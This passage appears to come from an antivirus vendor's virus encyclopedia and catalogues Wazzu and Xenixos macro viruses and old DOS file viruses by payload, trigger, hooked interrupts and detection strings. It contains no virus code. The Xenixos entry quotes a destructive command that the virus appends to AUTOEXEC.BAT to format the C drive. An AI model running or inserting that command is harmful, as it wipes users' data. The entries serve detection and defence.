Destructive: No Common In-The-Wild: Yes Description: The difference between this new variant and Wazzu.D is that some unused codes are missing in Wazzu.E. The difference to the original Wazzu is that it does not contain any destructive payload, such as changing documents. Wazzu.E is only infectious. [WORD_Wazzu.F] Virus name: WORD_Wazzu.F Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: autoOpen Size of macros: 450 Bytes Place of origin: Unknown Date of origin: September 1996 Destructive: No Common In-The-Wild: Yes Description: Wazzu.F is a minor variant of Wazzu.C with two changes. Wazzu.F displays a message with a 1/10 chance and its code is encrypted. The difference to the original Wazzu is that Wazzu.F does not contain any destructive payload, such as changing documents. Wazzu.F is only infectious. The following message is displayed with a 1/10 chance: " This one's for you, Bosco. " [WORD_Wazzu.G] Virus name: WORD_Wazzu.G Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.G has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. There is a 3/5 chance that one word is moved to another position in the active document. [WORD_Wazzu.H] Virus name: WORD_Wazzu.H Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 943 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: Yes Description: Wazzu.H is a newly rewritten Wazzu variant. Each of its six payloads triggers with a chance of 1/6. One payload displays the following message: " Thank's for using Microsloth Warp for Windblowz " Other payloads create 20 new documents or delete all files in the root directory (C:\*.*). Wazzu.H infects the global template when an infected document is opened. Further files become infected when they are also opened (AutoOpen). [WORD_Wazzu.I] Virus name: WORD_Wazzu.I Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 333 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.I is another "do-nothing" macro virus with no payload and slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.J] Virus name: WORD_Wazzu.J Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 675 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: Yes Description: The difference between this new variant and the original Wazzu.A virus is that some spaces have been deleted from the macro virus code. For more information, please refer to the Wazzu.A virus description. [WORD_Wazzu.K] Virus name: WORD_Wazzu.K Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.K is another "do-nothing" macro virus with a corrupted payload and slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.L] Virus name: WORD_Wazzu.L Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 347 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.L has some modified codes. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). When a user opens a document, Wazzu.L adds the following text at the end of the document: " wazzu! " [WORD_Wazzu.M] Virus name: WORD_Wazzu.M Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 443 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.M is another "do-nothing" macro virus with a corrupted payload and slightly modified code. Due to the corruption, Word displays an error message. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.N] Virus name: WORD_Wazzu.N Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 432 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that the code has been slightly modified. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.O] Virus name: WORD_Wazzu.O Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 309 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.O is another "do-nothing" macro virus with no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.P] Virus name: WORD_Wazzu.P Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 460 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: The difference between this new variant and the original Wazzu.A virus is that the payload has been deleted from the code. Wazzu.P is still able to infect the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.Q] Virus name: WORD_Wazzu.Q Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 331 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.Q is another "do-nothing" macro virus with no payload and slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.R] Virus name: WORD_Wazzu.R Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 552 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: Wazzu.R is a minor variant of Wazzu.F with some additional codes. Wazzu.R displays the following message with a 1/10 chance: " This one's for you, Bosco. " Wazzu.R infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.S] Virus name: WORD_Wazzu.S Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 343 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.S is another "do-nothing" macro virus with a corrupted payload and slightly modified code. Due to the corruption, Word displays an error message. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.T] Virus name: WORD_Wazzu.T Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 431 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.T is another "do-nothing" macro virus with no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.U] Virus name: WORD_Wazzu.U Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 621 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.U has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. There is a 3/5 chance that one word is moved to another position in the active document. [WORD_Wazzu.V] Virus name: WORD_Wazzu.V Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 375 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.V is another "do-nothing" macro virus with some corrupted codes and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). It also contains the following comment in its code: " REM This macro wipes out the Wazzu Virus! " [WORD_Wazzu.W] Virus name: WORD_Wazzu.W Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 332 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.W is another "do-nothing" macro virus with no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.X] Virus name: WORD_Wazzu.X Virus Type: Word macro virus Alias: WORD_Grinder Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 617 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.X is another "do-nothing" macro virus with no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Wazzu.X contains the following comment in its code: " The Meat Grinder virus - Thanks to Kermit the Frog, " " ' and Kermit the Protocol " Wazzu.X is also able to convert itself to the Word97 Word format (Word8). [WORD_Grinder] Virus name: WORD_Grinder Virus Type: Word macro virus Alias: WORD_Wazzu.X Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 617 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: This virus is another "do-nothing" macro virus with no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Grinder contains the following comment in its code: " The Meat Grinder virus - Thanks to Kermit the Frog, " " ' and Kermit the Protocol " Grinder is also able to convert itself to the Word97 Word format (Word8). [WORD_Wazzu.Z] Virus name: WORD_Wazzu.Z Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 666 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.Z has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For additional information, please refer to the Wazzu.A virus description. [WORD_Wazzu.Y] Virus name: WORD_Wazzu.Y Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 652 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: The difference between this new variant and the original Wazzu.A virus is that some TABs have been replaced by spaces in the source code. This has no effect on the behavior of this new variant. For further information, please refer to the Wazzu.A virus. [WORD_Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)] Virus name: WORD_Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen) Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: AutoOpen, AutoClose Size of macros: 638 Bytes Place of origin: Germany Date of origin: Spring 1996 Destructive: Yes Common In-The-Wild: No Description: Wieder is not a virus but a trojan horse. It does not infect other files. When an infected document is opened, Wieder creates the directory "C:\TROJA", and moves the system file "C:\AUTOEXEC.BAT" into the newly created directory. After moving the file the original files are deleted. When closing an infected document, the following messages are displayed: " Auf Wieder÷ffnen " " P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei " " gerne wiederhaben moechten, sollten Sie einen " " Blick in das neue Verzeichnis C:\TROJA werfen... " The original document, which included the trojan, has the following messages: " Trojanisches Pferd " " Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT- " " Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben " " Sie eine Kopie davon ? " " Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen " " und mit ein klein wenig mehr Aufwand koennte man auch einen " " Virus installieren. " [WORD_Xenixos.A (a.k.a. Nemesis, Evil One, XOS)] Virus name: WORD_Xenixos.A (a.k.a. Nemesis, Evil One, XOS) Virus Type: Word macro virus Number of macros: 11 Encrypted: Yes Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken, DateiDruckenStandard, DateiOeffnen, DateiSpeichern, SateiSpeichernUnter, Drop, Dummy, ExtrasMakro Size of macros: 31342 Bytes Place of origin: Austria Date of origin: February 1996 Destructive: Yes Common In-The-Wild: No Description: Xenixos was the first macro virus that was written especially for the German version of Microsoft Word. All macro names are in German, and therefore it only works with the German Word version. The infected global template (normal.dot) includes the following additional macros: "AutoClose" "AutoExit" "AutoNew" When an infected document is opened, Xenixos infects the global template unless the "DateiSpeichernUnter" macro is already present. Further documents become infected when using the "DateiSpeichern" and "DateiSpeichernUnter" commands. Files with the name "VIRUS.DOT" will not become infected. During infection, Xenixos checks the system date and then activates various destructive payloads according to the date. During the month of May it adds the following text to "C:\AUTOEXEC.BAT": " @echo j format c: /u > nul " This will format the C:\ drive. During the month of March, Xenixos tries to activate the DOS virus "Neuroquila" by using a DOS DEBUG script. This part of the virus is faulty (it tries to create an .EXE file) and therefore the DOS-based virus never infects the system. The third destructive payload checks the system time, and in case of a value larger than 45 in the seconds field, it will add the password "XENIXOS" to a saved document. Upon printing a document, Xenixos checks the system time again, and in case of a value smaller than 30 in the seconds field, it will add the following text at the end of the printed document: " Nemesis Corp. " Xenixos also replaces the Tools|Macros to make recognition of an infected document more difficult (called macro stealth technique). The new code displays the following error message instead of the activation of Word's built-in macro viewer/editor: " Diese Option ist derzeit leider nicht verfuegbar " In addition, Xenixos changes section "Compatibility" inside the win.ini file. It sets the variable "RR2CD" to the value "0x0020401", and the variable "Diag$" to "0". The WIN.INI variables can be used to deactivate the virus. Setting the variable "Diag$" to "1" will prevent most of the destructive payloads. [WORD_Xenixos.B] Virus name: WORD_Xenixos.B Virus Type: Word macro virus Number of macros: 11 (24) Encrypted: Yes Macro names: Drop, Dummy, AutoExec, AutoOpen, DateiOEffnen, ExtrasMakro, DateiBeenden, DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard Size of macros: 31342 Bytes Place of origin: Germany Date of origin: February 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Xenixos.A virus is that the first four bytes of the "DateiDruckenStandard" macro are changed. This new variant still activates and infects further documents. Xenixos.B only works with the German version of Microsoft Word, since it uses language specific macros. For more information, please refer to the Xenixos.A virus description. [WORD_Zero.A:De] Virus name: WORD_Zero.A:De Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: dok, dsu, wrd, extrasmakro, dateischliessen, dateispeichern, dateidokvorlagen,dokumentschliessen, dateispeichernunter Size of macros: 727 Bytes Place of origin: Germany Date of origin: February 1997 Destructive: No Seen In-The-Wild: No Description: Zero uses a new infection technique. Instead of infecting the global template (normal.dot), it creates a file (0.DOT) in the "STARTUP" (default: C:\MSOFFICE\WINWORD\STARTUP) directory. Zero activates when the "DokumentSchliessen" or "Extrasmacro" option is used. After creating the 0.dot file it copies its virus macros to the active document when the "DateiSpeichern" or "DateiSpeichernUnter" option is used. Zero also uses "Extrasmacro" to make recognition of an infected document more difficult (called macro stealth technique). [WORD_Generic] Virus name: WORD_Generic (any unknown Macro virus) Virus type: Word macro virus Number of macros: Virus Dependent Encrypted: Virus Dependent Macro names: Virus Dependent Size of macros: Virus Dependent Place of origin: Anywhere Date of origin: Virus Dependent Destructive: Virus Dependent Common In-The-Wild: Virus Dependent Description: "WORD_Generic Macro Virus" is the generic name used by Trend Micro's antivirus researchers to describe Macro viruses of unknown origin and routine detected by the MacroTrap. Unlike the strict virus pattern matching methodology used to detect known viruses, the Trend Micro MacroTrap identifies Macro viruses that have not been previously identified by antivirus researchers. Such viruses can exist in either the "Wild" (viruses infecting real users) or in the "Zoo," (viruses known only to antivirus researchers). Before an antivirus product can detect and clean unknown macro viruses, the virus must first be found and isolated. The virus is then analyzed to learn it's damage routine and a "signature" is developed so the virus can be quickly identified and removed from infected files. The signature is incorporated into the virus pattern file which is made available to the public, typically at biweekly intervals. But because Macro viruses are so easy to create and spread, it is not practical to rely solely on virus pattern matching and up-to-date signatures to identify the stream of new macro viruses. Considering that "virus kits" are now available via the Internet, and considering the pervasive reach of e-mail, the only reliable long-term solution against the flow of Macro viruses clearly is Trend's rules-based MacroTrap. Unknown macro viruses range in complexity and threat from innocuous (for example the original WORD_Concept virus) to the viscously destructive (for example, WORD_MDMA, deletes every file on your hard drive). When MacroTrap detects and cleans files infected with Word-based Macro viruses, both the virus and the infected macro are removed. They can be deleted or quarantined, depending on the user's preference. Trend Micro is the first to develop this technology and we have incorporated it into our entire line of antivirus products to augment our award winning 32-bit, multi-threading scan engine. [Jerusalem.1244] Virus Type: File Virus Other Name: Virus Length: 1456 bytes Virus Reinfect Type: doesn't reinfect Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h, Int 8h Infection Procedure: 1) Modifies the allocated memory, BX=5Eh and ES=114Ch then gets the interrupt vector, hooking int 21h, sets it and gets the interrupt vector, this time hooking int 8h then sets it. 2) It gets the date and checks whether the date is January 1. If it is, it moves a value of 0h to DS:[0003]; if not, it compares it immediately to DS:[0003]. 3) It gives back the address 114ch to ES then gets the data stored in ES:[2C] and places it in ES. Then it frees allocated memory, ES=1043 paragraph address of the start of the memory block. 4) It gets the child's return code and terminate-and-stay-resident. [Jerusalem.1500] Virus Type: File Virus Virus Length: 2160 bytes Virus Reinfect Type: doesn't reinfect Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h Infection Procedure: 1) It sets a new date for the system but the specified date is invalid. 2) It modifies the allocated memory BX=80h and ES=114Ch. [Mummy-2] Virus Type: File Virus Virus Length: 1648 bytes Original Name: Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h Infection Procedure: 1) Encrypts the data found in address 1152:049Eh up to 1152:04E5h and forms "PC Virus Mummy Ver. 2.1.Kaohsiung Senior School Tzeng Jau Ming presents" then saves the address of ES to CS:[494], [458], [442], [446], [44A]. 2) Adds 10h to the address of ES and stores it to CS:[400] and [45C]. 3) Moves the original header of the program to be ready for execution, modifies the allocated memory, and gets the interrupt vector. 4) Saves the value of ES and BX to addresses CS:[044C] and CS:[044E] respectively. 5) Executes the child program. Detection method: Check for the following message: "PC Virus Mummy Ver 2.1 Kaohsiung Senior School Tzeng Jan Ming presents" [Jers-Zero-Aust.A] Virus Type: File Virus Virus Length: 2000 bytes Trigger Condition: Year must be 1992 up, Day must be Friday Virus Reinfect Type: doesn't reinfect Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h Infection Procedure: The virus obviously is a softmice type, having to encrypt CS:[SI] or 114C:[11E] to 114C:[7AD] by XOR it to 0Eh, then encrypt CS:[SI] again but this time it's from 115C:[EB] to 115C:[159], XOR it from 1Eh, IEh increments by 1, it loops until 6Fh. Then it saves ES which is 114C to 4 different locations. Then it adds 10h to 114Ch and saves it in CS:[0115] by adding what is stored in it and also in CS:[0111]. Then it replaces the data stored in DS:SI to ES:DI which are the same. No replacement were made. Then it modifies the allocated memory, BX=9Bh and ES=114Ch. Gets the interrupt vector by hooking Int 21h, then sets it. Gets the Date and checks if the year is 1992 up and the day is Friday. Next, it frees the allocated memory then gets the child process. Lastly, it terminates and stays resident. While memory resident, the virus infects any COM and/or EXE files. Does not load if it is already memory resident. [MacGyver.2803.A] Virus Type: File Virus Virus Length: 2803 bytes Virus Infect Type: EXE only Virus Memory Type: MCB Memory Resident Place of Origin: PC Vectors Hooked: INT 01h, INT 21h Infection Procedure: 1) Moves its code to the memory location nearest the MCB chain. 2) Makes it memory resident. 3) Gives the control to where the code was transferred and then calls the function "Get DOS Version No." 4) Hooks INT 1 and INT 21. 5) Modifies the Memory Block and allocates 3072 bytes. Note: This virus hooks INT 01h (a Single Step Interrupt used by debuggers like DEBUG and LDR). [Backform.2000.A1] Virus Type: File Virus Virus Length: 1855 bytes Virus Infect Type: .COM files Virus Memory Type: Non-memory resident Place of Origin: PC Vectors Hooked: Infection Procedure: 1) Searches for COMMAND.COM in drive C. If the search fails, the virus terminates. If the file is present, it checks if its first byte is a jump instruction (E9H). If it is, it infects it; if not, the virus terminates leaving no harm to the file. After attaching itself to the file the virus is executed every time the system boots up. 2) Checks whether the current month is June. If it is, then it searches and infects .COM files in drive A. Damage: Detection method: Infected files increase by 2051 bytes. Note: [Vacsina_2] Other Name: VACSINA Place of Origin: Virus Type: File Virus Virus Length: Virus Re-infect: Does not reinfect Virus Memory Type: MCB Type PC Vectors Hooked: INT 21h Infection Procedure: 1) Loads itself to high memory. Loads 1216 bytes in the memory. 2) Infects *.COM and *.EXE files. Copies the virus code to the host program. The virus loads first before running the host program. While in the memory, the virus infects all files that are opened. Note: The virus tries to create a new segment address for it to run its code. This one is used primarily to switch between the host program and the virus itself. Using Int 21, Function 50. What it does basically is to tell the operating system that the TSR code is the primary process rather than the interrupted process of the program. This creates an initial execution rather than executing the original code first. In this way, the virus is able to run, then it can copy itself to the host using Int 21, functions 35 and 25. The copy process is finalized when the virus code sets the DTA. In this effect the virus can stick to the host program and run in the future. [BADSECTOR.3428] Virus Name: BADS3428 Virus Type: Parasitic, File Virus Virus Length: 3,434 bytes Original Name: BAD SECTOR 1.2 Virus Infect Type: .COM files Virus Memory Type: High memory resident Place of Origin: PC Vectors Hooked: INT 8h, INT 16h, INT 26h INT 21h, INT 25h Infection Procedure: The virus only infects .COM files. It increases an infected file's size by 3,434 bytes. The virus infects the host file by attaching itself at the end of the file. The virus becomes memory resident upon loading and executing an infected file. While memory resident it can corrupt other .COM files on the disk when a file is opened or copied, and sometimes causes a memory allocation error. It can also hide the change in the size of infected files when resident. The virus replicates its code in the high memory at 9EC0:0000 and stays resident there. It hooks INT 21 and changes its vector to point to its program in the high memory at 9EC0:002A. It uses this interrupt to attach itself to the host program. It also hooks to other interrupts such as INT 8H (9EC0:0876), INT 16H (9EC0:08A5), INT 25H (9EC0:0FBC), and INT 26H (9EC0:0FC6), but no payload is seen. The virus just replicates itself and corrupts existing .COM files. Text strings can be seen inside the virus code which is: "Bad Sectors 1.2" "COMEXE" Damage: Corrupts executable files. Detection method: Infected files increase by 3,434 bytes. Note: [Tai-Pan.438.A] Virus Type: File Virus Virus Length: Approximately 438 bytes Virus Memory Type: High Memory PC Vectors Hooked: INT 21h Infection Procedure: 1) Loads itself to high memory. Loads approximately 512 bytes in the memory. 2) Infects *.EXE files. Copies the virus code to the host program. Adding approximately 438 (01B6H) bytes. Loads the virus first before running the host program. While in the memory, EXE files that are opened get infected. The virus reacts ordinarily by allocating space in the memory before infecting files, using Int 21 (48). Nothing extraordinary happens. It just attaches its code to the host program after it is loaded from the memory. Damage: Symptoms: Free memory decreases. Increase in file size. May display: "[Whisper Presenterar Tai-Pan]" which appears in the virus code. Detection method: Check for the above message. Note: [Tai-Pan.666] Virus Type: File Virus Virus Length: Approximately 666 bytes Virus Memory Type: High Memory PC Vectors Hooked: INT 21h Infection Procedure: 1) Loads itself to high memory. Loads approximately 710 bytes in the memory. 2) Infects *.EXE files. Copies the virus code to the host program, adding approximately 666 (029AH) bytes. Loads the virus first before running the host program. While in the memory, EXE files that are opened get infected. The virus reacts ordinarily by allocating space in the memory before infecting files, using Int 21 (48). Nothing extraordinary happens. It just attaches its code to the host program after it is loaded from the memory. Damage: Symptom: Free memory decreases. Increase in file size. May display: "DOOM2,EXE. Illegal DOOM II signature" "Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2" "Say bye-bye HD" "The programmer of DOOM II DEATH is in no way affiliated with ID Software." "ID Software is in no way affiliated with DOOM II DEATH." which appears in the virus code. Detection method: Check for the above messages. Note: [Keypress-9] Virus Type: File Virus (COM and EXE files) Place of Origin: Virus Memory Type: PC Vectors Hooked: INT 21h Infection Procedure: The virus hooks INT 21h to infect COM and EXE files, increasing their sizes by 2 kbytes. After the virus is executed, it waits for an EXE and/or COM files to infect. It infects all COM and EXE files except COMMAND.COM. Infected files contain the following messages: "This is an [ illegal copy ] of keypress virus remover" "Systems Halted." "Eternal Fair" The virus doesn't reinfect if the file being executed is already infected. [BBS.1643] Virus Type: File Virus, Soft Mice Other Name: Major BBS Virus Length: 1642-1644 bytes Virus Infect Type: EXE files only Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 21h, INT 8h Infection Procedure: 1) Decrypts 1595 bytes of its virus code. 2) Checks if the file executed is already infected. If it is not, the virus copies its encrypted code onto it. Then it copies its 1644 bytes of code to the high memory but allocates 30384 bytes in memory. 3) Gets the DOS Re-entrancy Flag which DOS looks up when INT 21h is used. 4) Hooks INT 21 and INT 8 and then terminates. Damage: There is no evident damage this virus can do but will decrypt this message: "The Major BBS Virus" "created by Major tomTugger" Detection method: This virus will display a write-protect error when a read command is executed (like opening a file). [Maltese_Amoeba] Virus Type: File Virus, Soft Mice Other Name: AMOEBA Virus Length: 3589 bytes Trigger Condition: Nov. 1, Mar. 15 Virus Re-infect: Virus Memory Type: High Memory Resident Place of Origin: MALTA PC Vectors Hooked: INT 21h Infection Procedure: 1) Decrypts 1184 bytes of its virus code. 2) Checks if the executed file is an uninfected EXE or COM file. If it is, the virus infects it. 3) Allocates 4096 bytes in the high memory area and transfers 3589 bytes of its virus code to HMA. 4) Hooks INT 21. 5) Returns control to the original routine. Damage: If the system date is November 1 or March 15, the virus formats the hard disk by overwriting the first 4 sectors of every track with garbage. This destroys the boot sector and the File Allocation Table. This also makes the hard disk a non-DOS partition disk. The virus also formats the floppy disk (if present). The virus will also display garbage and random screen colors. This message can be found in the virus code: "AMOEBA virus by the Hacker Twins (c) 1991" "This is nothing, wait for the release of" "AMOEBA II-the universal infector hidden to" "any eye but ours!" "Dedicated to the University of Malta-the worst" "educational system in the universe and destroyer" "of 5x2 years of human life" This message will appear on the screen after the virus has trashed the hard disk: "To see a world in a grain of sand, And a heaven in a wild flower Hold Infinity in the palm of your hand And Eternity in an hour." THE VIRUS 16/3/91 [Vampiro.A] Virus Type: File Virus Virus Length: Virus Memory Type: High Memory PC Vectors Hooked: INT 21h Infection method: 1) Gets the system date and time. It executes the virus code if the current month is earlier than June, or the time is earlier than 10 pm. The virus infects *.COM files not in the root directory. It opens and searches subdirectories where it looks for *.COM files to infect. It attaches itself to the host program. Damage: The virus infects files in the subdirectory. If trigger date and time are not satisfied, it displays: "Zarathustra & Drako les comunican que llego la hora de ir a dormir. Shh! Vampiro Virus." Notes: 1) Non-resident virus. 2) Does not use memory allocation. 3) Runs directly. Symptom: The following strings can be found in the code: "Zarathustra & Drako les comunican que llego la hora de ir a dormir. Shh! Vampiro Virus." "Command.com all xray, memory allocation error." "Cannot uninstall xray, it has not been installed." "???????????" [Mange-Tout.1099] Virus Type: File Type (EXE files) Virus Length: Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 08h, INT 09h, INT 21h Infection Procedure: 1) Copies its code to address 0054:0000. 2) Does a series of ins and outs at port 21h. 3) Hooks INT 8, 9, and 21. 4) Checks the carrier file if it is an EXE file. If it is, the virus infects it by transferring the first 198 bytes of the original code at the end of the file and transfering the virus code at the beginning. [TP39VIR] Other Name: Yank-39 Virus Type: File Virus Virus Length: Approximately 2768 bytes Virus Memory Type: Trigger: Triggers if time is 5:00 pm of any day. Plays part of the song: "Jack and Jill" Run Directly: Loads virus code to high memory PC Vectors Hooked: Int 21 Infection Procedure: 1) Loads itself to high memory, allocating 2896 bytes. 2) Moves 2768 bytes onto the memory. 3) Infects *.COM and *.EXE files. Copies the virus code to the host program. Loads the virus first before running the host program. [Xpeh.4928] Other Name: Yankxpeh Virus Type: File Virus Virus Length: Approximately 4768 bytes Place of Origin: Run Directly: Loads virus code to high memory PC Vectors Hooked: Int 21 Infection Procedure: 1) Loads itself to high memory, allocating 4944 bytes. 2) Moves 4768 bytes onto the memory. 3) Infects *.COM and *.EXE files. Copies the virus code to the host program. Loads the virus first before running the host program. [Tanpro.5241] Virus Name: Tanpro Virus Type: File Virus Virus Length: Approximately 524 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21, Int 27 Infection Procedure: Uses TSR, Int 27. Allocates 3104 bytes (using MEM) of the memory. Creates a hidden un-named file within the root directory with a size of 10000 bytes. Within the code is the string "This file is infected..." Executes this program, deletes it afterwards then calls Int 27, to retain its possession of the memory for further infection of other files. Infects *.COM and *.EXE files. Copies the virus code to the host program, adding approximately 524 bytes. Loads the virus first before running the host program. The virus, while memory resident, infects any executed *.COM and *.EXE files. It does not do anything special. It just replicates when it is memory resident. Infects file only if it is executed. Damage: 1) Free memory decreases by approximately 3104 bytes. 2) Increases file size by approximately 524 bytes. Symptom: 1) Delay in program execution due to virus activity. 2) Text string: "(c) tanpro'94" appears within the virus code. Detection method: Locate mentioned text string. [Manzon] Virus Type: File Virus, Soft Mice Virus Length: 1712 Bytes Virus Infect Type: COM files Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: 1) Decrypts 1417 bytes of its code and then allocates 1728 bytes in HMA. 2) Transfers its code to HMA with a size of 1712 bytes. 3) Hooks INT 21. 4) Returns control to the original routine. The virus code has text strings of programs and dos utilities which the virus uses to compare with the target file. This method makes detection more difficult. [Kaos4.A] Virus Type: File Virus Virus Length: Place of Origin: Virus Memory Type: Non Resident PC Vectors Hooked : Infection Procedure: 1) Sets the disk transfer area, 114C:0816h. 2) Tries to infect COM and EXE files in the same directory and other directories specified in PATH. It uses the Find First Match Directory Entry, there it infects all EXE and COM files. Then the Next Directory Entry, there it also infects all EXE and COM files. 3) Sets DTA again, 114C:0080h. 4) Displays the message stored in the virus code. [Sarampo.B] Virus Type: File Virus (COM and EXE files) Eff Length : 1371 bytes Symptoms : Increase in size of infected COM and EXE files by 1371 bytes and decrease in available memory by 1664 bytes. Executing programs may slow down due to the infection procedure of the virus. General Comments: During the first infection, the virus allocates 1664 bytes in the memory and transfers its code to HMA. It also hooks INT 21 and INT 24. Then rebuilds the carrier program while it is memory resident so it can return control to the original routine. This virus infects all opened, executed and copied COM and EXE files. It also changes the file's time to 1:13pm. SARAMPO displays some garbage on the screen if the system date is April 25, December 25 or October 12, and the virus is already resident for about 2 minutes. This text is found in the virus code: "Do you like this Screen Saver ? I hope so." "Created by Sarampo virus" [Hare.7610] Virus Type: 